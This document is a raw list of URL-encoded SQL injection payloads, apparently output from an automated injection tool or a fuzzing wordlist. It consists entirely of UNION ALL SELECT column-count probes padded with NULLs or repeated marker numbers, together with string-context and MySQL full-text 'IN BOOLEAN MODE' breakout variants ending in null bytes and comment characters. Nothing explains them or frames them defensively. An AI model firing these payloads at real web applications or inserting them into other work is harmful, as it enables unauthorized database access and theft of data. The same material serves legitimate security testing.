1234.5%20%2B%20%28SELECT%201313%20WHERE%203672%3D3672%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204479%20WHERE%207363%3D7363%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206369%20WHERE%204057%3D4057%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206259%20WHERE%209106%3D9106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204329%20WHERE%204538%3D4538%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%209203%20WHERE%209232%3D9232%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202571%20WHERE%203402%3D3402%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203932%20WHERE%206404%3D6404%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%205814%20WHERE%205580%3D5580%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%27%20%2B%20%28SELECT%20%27BkEs%27%20FROM%20DUAL%20WHERE%207827%3D7827%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27SfBx%27%20FROM%20DUAL%20WHERE%208752%3D8752%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27weev%27%20FROM%20DUAL%20WHERE%206447%3D6447%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27TeSb%27%20FROM%20DUAL%20WHERE%205626%3D5626%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27OjnO%27%20FROM%20DUAL%20WHERE%201961%3D1961%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27XAXP%27%20FROM%20DUAL%20WHERE%201756%3D1756%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jqVP%27%20FROM%20DUAL%20WHERE%209081%3D9081%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27WAbx%27%20FROM%20DUAL%20WHERE%209016%3D9016%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ABDJ%27%20FROM%20DUAL%20WHERE%207946%3D7946%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MphE%27%20FROM%20DUAL%20WHERE%205227%3D5227%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tBqa%27%20WHERE%202547%3D2547%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uxRQ%27%20WHERE%203263%3D3263%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27JduA%27%20WHERE%201688%3D1688%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27enaF%27%20WHERE%204878%3D4878%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27DFfU%27%20WHERE%202166%3D2166%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27erQW%27%20WHERE%206626%3D6626%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Bmbv%27%20WHERE%205908%3D5908%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UshS%27%20WHERE%206729%3D6729%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YWMq%27%20WHERE%203204%3D3204%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bFqQ%27%20WHERE%205175%3D5175%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -1672%29%20UNION%20ALL%20SELECT%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%2C%205911%00 -9574%29%20UNION%20ALL%20SELECT%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%2C%205594%00 -4420%29%20UNION%20ALL%20SELECT%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%2C%209809%00 -7149%29%20UNION%20ALL%20SELECT%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%00 -5290%29%20UNION%20ALL%20SELECT%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%00 -4160%29%20UNION%20ALL%20SELECT%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%2C%201865%00 